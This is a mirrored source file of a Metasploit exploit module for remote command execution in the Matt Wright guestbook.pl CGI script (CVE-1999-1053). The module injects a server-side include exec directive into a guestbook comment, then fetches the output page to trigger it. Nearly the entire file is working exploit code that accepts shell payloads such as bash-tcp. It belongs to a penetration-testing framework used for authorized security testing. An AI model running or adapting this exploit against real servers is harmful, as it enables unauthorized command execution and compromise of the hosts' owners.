Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/guestbook_ssi_exec.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Matt Wright guestbook.pl Arbitrary Command Execution',

16
        'Description' => %q{

17
          The Matt Wright guestbook.pl <= v2.3.1 CGI script contains

18
          a flaw that may allow arbitrary command execution. The vulnerability

19
          requires that HTML posting is enabled in the guestbook.pl script, and

20
          that the web server must have the Server-Side Include (SSI) script

21
          handler enabled for the '.html' file type. By combining the script

22
          weakness with non-default server configuration, it is possible to exploit

23
          this vulnerability successfully.

24
        },

25
        'Author' => [ 'aushack' ],

26
        'License' => MSF_LICENSE,

27
        'References' => [

28
          [ 'CVE', '1999-1053' ],

29
          [ 'OSVDB', '84' ],

30
          [ 'BID', '776' ],

31
        ],

32
        'Privileged' => false,

33
        'Payload' => {

34
          'DisableNops' => true,

35
          'Space' => 1024,

36
          'Compat' =>

37
                        {

38
                          'PayloadType' => 'cmd cmd_bash',

39
                          'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',

40
                        }

41
        },

42
        'Platform' => %w{linux unix win},

43
        'Arch' => ARCH_CMD,

44
        'Targets' => [[ 'Automatic', {}]],

45
        'DisclosureDate' => '1999-11-05',

46
        'DefaultTarget' => 0,

47
        'Notes' => {

48
          'Reliability' => UNKNOWN_RELIABILITY,

49
          'Stability' => UNKNOWN_STABILITY,

50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
        }

52
      )

53
    )

54


55
    register_options(

56
      [

57
        OptString.new('URI', [true, "guestbook.pl script path", "/cgi-bin/guestbook.pl"]),

58
        OptString.new('URIOUT', [true, "guestbook.html output", "/guestbook/guestbook.html"]),

59
      ]

60
    )

61
  end

62


63
  def exploit

64
    realname	= rand_text_alphanumeric(20)

65
    email	= rand_text_alphanumeric(20)

66
    city	= rand_text_alphanumeric(20)

67
    state	= rand_text_alphanumeric(20)

68
    country	= rand_text_alphanumeric(20)

69


70
    sploit = Rex::Text.uri_encode("<!--#exec cmd=\"" + payload.encoded.gsub('"', '\"') + "\"", 'hex-normal')

71


72
    req1 = send_request_cgi({

73
      'uri' => normalize_uri(datastore['URI']),

74
      'method' => 'POST',

75
      'data' => "realname=#{realname}&username=#{email}&city=#{city}&state=#{state}&country=#{country}&comments=#{sploit}",

76
    }, 25)

77


78
    req2 = send_request_raw({

79
      'uri' => normalize_uri(datastore['URIOUT']),

80
    }, 25)

81
  end

82
end

83


84